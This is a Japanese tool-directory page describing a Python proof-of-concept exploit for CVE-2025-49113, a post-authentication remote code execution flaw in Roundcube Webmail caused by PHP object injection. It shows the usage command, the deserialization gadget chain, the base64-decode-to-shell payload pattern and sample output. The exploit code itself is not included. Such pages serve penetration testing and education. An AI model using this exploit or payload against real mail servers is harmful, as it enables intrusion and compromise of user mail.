Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-49113 — 💥 CVE-2025-49113 用 Python Exploit | Roundcube Webmail の PHP Object Injection による RCE | Kitploit
ツール/GitHubGitHub/00xcanelo/cve-2025-49113
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHub00xcanelo/cve-2025-49113

CVE-2025-49113

💥 CVE-2025-49113 用 Python Exploit | Roundcube Webmail の PHP Object Injection による RCE

リポジトリを見る
861年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-49113 – Roundcube Webmail RCE エクスプロイト (Python PoC)

CVE ID: CVE-2025-49113
エクスプロイト種別: リモートコード実行(PHPオブジェクトインジェクション経由)
対象アプリケーション: Roundcube Webmail ≤ 1.5.9 および ≤ 1.6.10
エクスプロイト言語: Python
作成者: 00xCanelo
ステータス: 脆弱なRoundcubeインストールでテスト済み、動作確認済み


📌 説明

このエクスプロイトは、Roundcube Webmailがアップロードされた画像ファイル名を処理する方法における脆弱性を利用します。このファイル名はPHPオブジェクトとしてアンシリアライズされます。Crypt_GPG_Engineのデシリアライゼーションチェーンをトリガーする悪意のあるペイロードを作成することで、認証後にリモートコード実行が可能になります。

このPython PoCは、公開されているPHPエクスプロイトで使用される攻撃チェーンを模倣していますが、よりクリーンなロジック、オプションのログ記録、および攻撃的なツール設定での使いやすさを備えています。


🚧 前提条件

  • 脆弱なRoundcubeバージョン(≤1.5.9 または ≤1.6.10)
  • Roundcube上の有効なユーザー資格情報
  • Python 3.x環境
  • pip install requests

🚀 エクスプロイト手順

root@kitploit:~
python3 CVE-2025-49113.py <target_url> <username> <password> <command>

例:

root@kitploit:~
python3 CVE-2025-49113.py https://mail.target.htb/ [email protected] 'P@ssw0rd123' 'id'

🔐 脆弱性チェーン

PHPクラスCrypt_GPG_Engineは_gpgconfフィールドの設定を許可し、それがその後シェル実行に渡されます。

私たちのペイロードは、_gpgconf内に以下を仕込みます:

root@kitploit:~
echo "<base64-encoded-cmd>" | base64 -d | sh

これによりデシリアライゼーション時にRCEに至ります。


💣 出力例

root@kitploit:~
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!

📁 ファイル構成

root@kitploit:~
.
├── CVE-2025-49113.py     # Python PoCスクリプト
└── README.md             # このドキュメント

⚠️ 免責事項

このコードは教育および認可されたセキュリティテストの目的に限ります。このツールの誤用は固く禁じられています。著者は生じた損害について一切の責任を負いません。


🧠 参考文献

  • https://nvd.nist.gov/vuln/detail/CVE-2025-49113
  • https://github.com/roundcube/roundcubemail/issues/9312
  • https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/
ツールをダウンロード